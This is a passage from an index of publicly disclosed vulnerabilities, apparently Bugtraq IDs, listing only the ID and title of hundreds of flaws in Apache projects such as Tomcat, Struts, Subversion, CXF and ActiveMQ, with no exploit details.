6474| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
6475| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
6476| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
6477| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
6478| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
6479| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
6480| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
6481| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
6482| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
6483| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
6484| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
6485| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
6486| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
6487| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
6488| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
6489| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
6490| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
6491| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
6492| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
6493| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
6494| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
6495| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
6496| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
6497| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
6498| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
6499| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
6500| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
6501| [76933] Apache James Server Unspecified Command Execution Vulnerability
6502| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
6503| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
6504| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
6505| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
6506| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
6507| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
6508| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
6509| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
6510| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
6511| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
6512| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
6513| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
6514| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
6515| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
6516| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
6517| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
6518| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
6519| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
6520| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
6521| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
6522| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
6523| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
6524| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
6525| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
6526| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
6527| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
6528| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
6529| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
6530| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
6531| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
6532| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
6533| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
6534| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
6535| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
6536| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
6537| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
6538| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
6539| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
6540| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
6541| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
6542| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
6543| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
6544| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
6545| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
6546| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
6547| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
6548| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
6549| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
6550| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
6551| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
6552| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
6553| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
6554| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
6555| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
6556| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
6557| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
6558| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
6559| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
6560| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
6561| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
6562| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
6563| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
6564| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
6565| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
6566| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
6567| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
6568| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
6569| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
6570| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
6571| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
6572| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
6573| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
6574| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
6575| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
6576| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
6577| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
6578| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
6579| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
6580| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
6581| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
6582| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
6583| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
6584| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
6585| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
6586| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
6587| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
6588| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
6589| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
6590| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
6591| [68229] Apache Harmony PRNG Entropy Weakness
6592| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
6593| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
6594| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
6595| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
6596| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
6597| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
6598| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
6599| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
6600| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
6601| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
6602| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
6603| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
6604| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
6605| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
6606| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
6607| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
6608| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
6609| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
6610| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
6611| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
6612| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
6613| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
6614| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
6615| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
6616| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
6617| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
6618| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
| [64780] Apache CloudStack Unauthorized Access Vulnerability
| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
| [59670] Apache VCL Multiple Input Validation Vulnerabilities
| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
| [54798] Apache Libcloud Man In The Middle Vulnerability
| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
| [54189] Apache Roller Cross Site Request Forgery Vulnerability
| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
| [53880] Apache CXF Child Policies Security Bypass Vulnerability
| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
| [49290] Apache Wicket Cross Site Scripting Vulnerability
| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
| [46953] Apache MPM-ITK Module Security Weakness
| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
| [46166] Apache Tomcat JVM Denial of Service Vulnerability
| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
| [44616] Apache Shiro Directory Traversal Vulnerability
| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
| [42492] Apache CXF XML DTD Processing Security Vulnerability
| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
